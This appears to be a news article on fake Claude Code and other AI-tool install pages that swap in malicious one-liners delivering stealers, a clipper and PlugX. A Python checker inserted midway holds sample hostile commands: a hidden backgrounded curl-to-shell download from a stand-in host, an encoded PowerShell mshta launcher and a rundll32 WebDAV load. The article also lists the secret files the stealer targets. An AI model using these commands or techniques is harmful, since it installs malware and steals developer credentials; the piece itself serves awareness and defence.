June 3, 2026

Developers hunting for the latest Anthropic tool now face a calculated risk. Search Google for “Claude Code install” or “Claude Code CLI.” The top result might not lead to code. It leads to compromise.

Since March 2026, attackers have flooded results with cloned pages. They mimic Anthropic’s documentation pixel for pixel. The layout matches. The fonts match. Even the sidebar navigation fools the eye. But one command differs. Users copy it. They paste it into a terminal. And the trap closes.

Push Security first exposed the pattern in early March. The firm named it InstallFix. A twist on the older ClickFix tactic. No fake error message. No CAPTCHA. Just swapped instructions on a page that looks official. Push Security noted the danger. “Unless you’re carefully reading the URL embedded in the install one-liner (and let’s be honest, almost nobody does these days), the page is indistinguishable from the real one.”

But the campaign runs far broader. Straiker researchers tracked 88 domains. Thirty-two still active in mid-May. They impersonate more than Claude. NotebookLM appears. So do JetBrains IDEs, Cline, Snowflake, Perplexity Comet and AtlasGPT. Ten or more hosting platforms host the fakes. Squarespace. GitHub Pages. Cloudflare Workers. Netlify. Even Tencent EdgeOne. Straiker.ai mapped the sprawl in late May.

GitHub Pages played a special role. Ten domains created between May 11 and 14 carried fake developer portfolios. Names like Ellis Park or Taylor Reed. Repositories themed around Claude. Empty titles. Paths such as /app or /macos. JavaScript redirects waited. Cloaked. They fired only for certain user agents. GitHub’s reputation became the launchpad.

The lure works because trust runs deep. Developers adopt AI coding assistants fast. They paste commands without hesitation. That habit now costs them. “The attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt,” Straiker researchers wrote. “You copy a command. You paste it in your terminal. By then, it’s already too late.”

One technique stands out: the ampersand trick. The command looks clean, but it ends with a single & followed by a second, hidden command. In a shell a lone & sends the preceding command to the background and moves straight on to whatever follows, so the genuine installer runs while the malware launches beside it. The installer's normal output hides the damage. Base64 encoding obscures the payload URLs. MSHTA.exe pulls HTA files. Rundll32 loads DLLs over WebDAV. Multi-stage chains follow.
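A pre-paste check for the swaps described above, as an added example (it is not code from the article or from any of the vendors it cites): a Python function that pulls every URL out of an install one-liner, including URLs hidden in base64 for bash or in a PowerShell -EncodedCommand, compares each host against an allowlist of official install domains, and flags a lone & that backgrounds the visible command, loader binaries such as mshta.exe, and rundll32 DLL paths over WebDAV. It also implements the "check the domain" step the article recommends at the end. The allowlist, the example hostnames and the sample commands are constructed assumptions, not data from the campaign.

```python
"""Pre-paste audit of an install one-liner (added example, not vendor code)."""
import base64
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumption: hosts the genuine install instructions are expected to fetch from.
OFFICIAL_HOSTS = {"claude.ai", "anthropic.com", "registry.npmjs.org"}

URL_RE = re.compile(r"https?://[^\s'\"<>|;)]+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
LOADER_RE = re.compile(r"\b(mshta|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b", re.I)
WEBDAV_RE = re.compile(r"\\\\[\w.-]+(?:@\d+|@ssl)*\\|davwwwroot", re.I)
PS_ENC_RE = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s", re.I)
# A lone '&' (not '&&', '&>' or '2>&1') with another command after it.
BACKGROUND_RE = re.compile(r"(?<![&>])&(?![&>])\s*\S")


@dataclass
class Audit:
    urls: list = field(default_factory=list)         # every URL, visible or decoded
    hidden_urls: list = field(default_factory=list)  # only visible after base64 decoding
    findings: list = field(default_factory=list)

    @property
    def safe(self) -> bool:
        return not self.findings


def _decoded_texts(blob: str) -> list:
    """Decode a base64 candidate as UTF-8 (bash 'base64 -d') and as UTF-16LE
    (PowerShell -EncodedCommand); return whichever decodings succeed."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return []
    texts = []
    for enc in ("utf-8", "utf-16le"):
        try:
            texts.append(raw.decode(enc))
        except UnicodeDecodeError:
            pass
    return texts


def _allowed(host: str, official: set) -> bool:
    return any(host == h or host.endswith("." + h) for h in official)


def audit_one_liner(cmd: str, official: set = OFFICIAL_HOSTS) -> Audit:
    """Return the URLs a one-liner fetches and every reason not to paste it."""
    a = Audit()
    texts = [cmd]
    for blob in B64_RE.findall(cmd):
        for text in _decoded_texts(blob):
            a.hidden_urls.extend(URL_RE.findall(text))
            texts.append(text)
    a.urls = URL_RE.findall(cmd) + list(a.hidden_urls)
    for url in a.urls:
        host = (urlparse(url).hostname or "").lower()
        if not _allowed(host, official):
            a.findings.append(f"fetches from unofficial host {host!r}: {url}")
    for url in a.hidden_urls:
        a.findings.append(f"URL hidden in base64: {url}")
    for text in texts:
        stripped = URL_RE.sub(" ", text)  # '&' inside a query string is not job control
        if BACKGROUND_RE.search(stripped):
            a.findings.append("lone '&' backgrounds the visible command and runs a second one")
        for m in LOADER_RE.finditer(stripped):
            a.findings.append(f"invokes loader binary {m.group(1).lower()}")
        if WEBDAV_RE.search(text):
            a.findings.append("references a WebDAV/UNC path")
        if "powershell" in stripped.lower() and PS_ENC_RE.search(stripped):
            a.findings.append("powershell encoded command")
    return a


def _b64(text: str, encoding: str = "utf-8") -> str:
    return base64.b64encode(text.encode(encoding)).decode()


# Constructed samples. 'genuine' stands in for what the real docs show; the
# others model the swaps the article describes. All other hostnames are invented.
SAMPLES = {
    "genuine": "curl -fsSL https://claude.ai/install.sh | bash",
    "swapped": "curl -fsSL https://claude-code-install.example/install.sh | bash",
    "ampersand": (
        "curl -fsSL https://claude.ai/install.sh | bash & "
        'curl -fsSL "$(echo ' + _b64("http://cdn49.example/loader.sh") + ' | base64 -d)" | sh'
    ),
    "windows": "powershell -nop -w hidden -enc "
               + _b64("mshta http://updates.example/i.hta", "utf-16le"),
    "webdav": r"rundll32 \\files.example@80\share\x.dll,Run",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        result = audit_one_liner(cmd)
        print(f"[{'ok ' if result.safe else 'BAD'}] {name}")
        for finding in result.findings:
            print("      -", finding)
```

The design point is that the check reads what the shell would actually run, not what the page shows: URLs are only trusted after base64 is unwrapped in both the bash and PowerShell encodings, and the ampersand test ignores `&&`, `&>` and `2>&1` so that a normal installer does not trip it. Wire `audit_one_liner` to a clipboard hook or a shell `preexec` wrapper and refuse to run anything whose `safe` is false.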

Payloads vary. ACRStealer dominates many chains. This information stealer targets 65 browsers. It grabs AI credentials first. Files from ~/.cline/data/secrets.json. ~/.continue/config.yaml. Snowflake SSH keys. Perplexity Comet profiles. One hundred seventy-five crypto wallets. Password managers. Messaging apps. Files containing seed, mnemonic, wallet, api or pem. It uses ChaCha20-Poly1305 encryption. Command and control travels through Telegram dead drops and Binance Smart Chain smart contracts.

A crypto clipper travels alongside. Rust-compiled. It watches the clipboard. Replaces wallet addresses across 20 blockchains. One primary BSC contract handles C2: 0x7CC3cFC1Ac007B8c6566fD2C7419b15a75473468. A fallback Ethereum address sits at 0xA1E50DaF64fb2B342A64d848E396700962acC2d0. The infrastructure resists takedown. “The infrastructure can’t be taken down,” Straiker observed. “The campaign’s crypto-clipper routes its command-and-control through a Binance Smart Chain smart contract. No domain to seize, no server to shut off.”

Other variants deliver different wares. Malwarebytes uncovered a site mimicking Claude's official download page. It pushed Claude-Pro-windows-x64.zip. The archive contained a trojanized MSI. It installed a working Claude app to a path with a deliberate misspelling: C:\Program Files (x86)\Anthropic\Claude\Cluade. A VBScript dropper ran the legitimate binary in the foreground. In the background it dropped NOVUpdate.exe, a signed G DATA binary, along with a malicious avk.dll and an encrypted .dat file. The triad landed in the Startup folder. Classic DLL sideloading: the signed NOVUpdate.exe loads avk.dll from its own directory, and the encrypted .dat file carries the payload. The result? PlugX. A remote access trojan active in espionage since 2008. Malwarebytes detailed the sideloading in April. Stefan Dasic, the researcher, noted the operators "combined a proven sideloading technique with a timely social engineering lure—exploiting the surging popularity of AI tools."

Trend Micro examined the InstallFix operation in May. The campaign hits multiple industries worldwide. Fake pages clone Anthropic's installation instructions. Google Ads push them to the top. Every link on the page points to the real Anthropic site. Only the one-liner command differs. It pulls from attacker domains. The firm called out the global reach and the speed with which new clones appear after takedowns.

Bitdefender spotted similar Google Ads abuse in March. Attackers bought ads for "download claude code" and variants. The landing page copied the Claude Code documentation exactly. Squarespace subdomains hosted many of them. One ad traced to a compromised Malaysian advertiser account.

Huntress saw the impact firsthand. An engineer searched for Claude Code and clicked the sponsored result. Within seconds a base64- and gzip-obfuscated script unpacked itself and went after the macOS keychain. It pulled Claude-related credentials. Obfuscated AppleScript hid the behavior. The firm's tooling caught it. But many environments lack that visibility.

Anthropic itself faced a related blow. On March 31 the company accidentally published a massive source map file to npm. Nearly 60 megabytes. Over 500,000 lines of unobfuscated TypeScript. The leak spread fast. Attackers spun up fake GitHub repos offering “unlocked” versions. Some dropped Vidar stealer and GhostSocks proxy. The timing amplified the fake install wave. Help Net Security covered the exploitation.

Recent weeks show no slowdown. As of late May, Straiker reported 15 new domains in a single cluster. SEO poisoning creates feedback loops. A fake page redirects to Google searches for install instructions. That boosts its own ranking. Paid ads carry UTM parameters that reveal campaign IDs. German language versions target specific locales with fake privacy policies.

Evasion layers stack high. Anti-debug checks. Sandbox detection. Direct syscalls. DLL unhooking. PPID spoofing. Post-quantum ML-KEM-768 encryption in one loader. Shellcode hidden in UUID strings. The ACRStealer binary talks over raw sockets and AFD. It bypasses AMSI with taunts in one variant.

Enterprise security teams now confront a new reality. Developers operate outside traditional perimeters. They install tools from terminals. They manage API keys that grant access to production systems, cloud resources and proprietary models. A single stolen key from Cline or Continue.dev can open doors wide.

Yet detection lags. Many EDR solutions miss the initial paste. The legitimate app runs. Users see expected behavior. Only later do anomalies surface. Credential exfiltration. Unusual clipboard activity. Connections to unfamiliar Telegram or blockchain endpoints.

Some defenders block entire categories. No GitHub Pages from unknown accounts. Strict allow lists for Squarespace subdomains. Browser policies that warn on lookalike domains. Application control that blocks mshta.exe and ad hoc PowerShell one-liners on developer machines. But adoption remains patchy.

The campaign proves something larger. AI tools moved from experiment to daily driver faster than security models adapted. Trust in documentation pages, in one-liner installs, in branded shortcuts became the attack surface. Operators noticed. They built campaigns around that trust.

Straiker warned directly. “If your team uses Claude Code, Cline, Continue.dev, or any AI coding assistant, your credentials are a target.” The message carries weight. Because the pages keep appearing. The ads keep running. And the paste command remains the weakest link.

Verification takes seconds. Check the domain. Visit the official Anthropic site directly. Avoid sponsored results for new tools. But habits die hard. And in the race between speed and scrutiny, speed usually wins. Until the bill arrives in the form of drained wallets, leaked keys and remote access trojans.

How Fake Claude Code Pages Became the New Front Line in Developer Malware Attacks first appeared on Web and IT News.
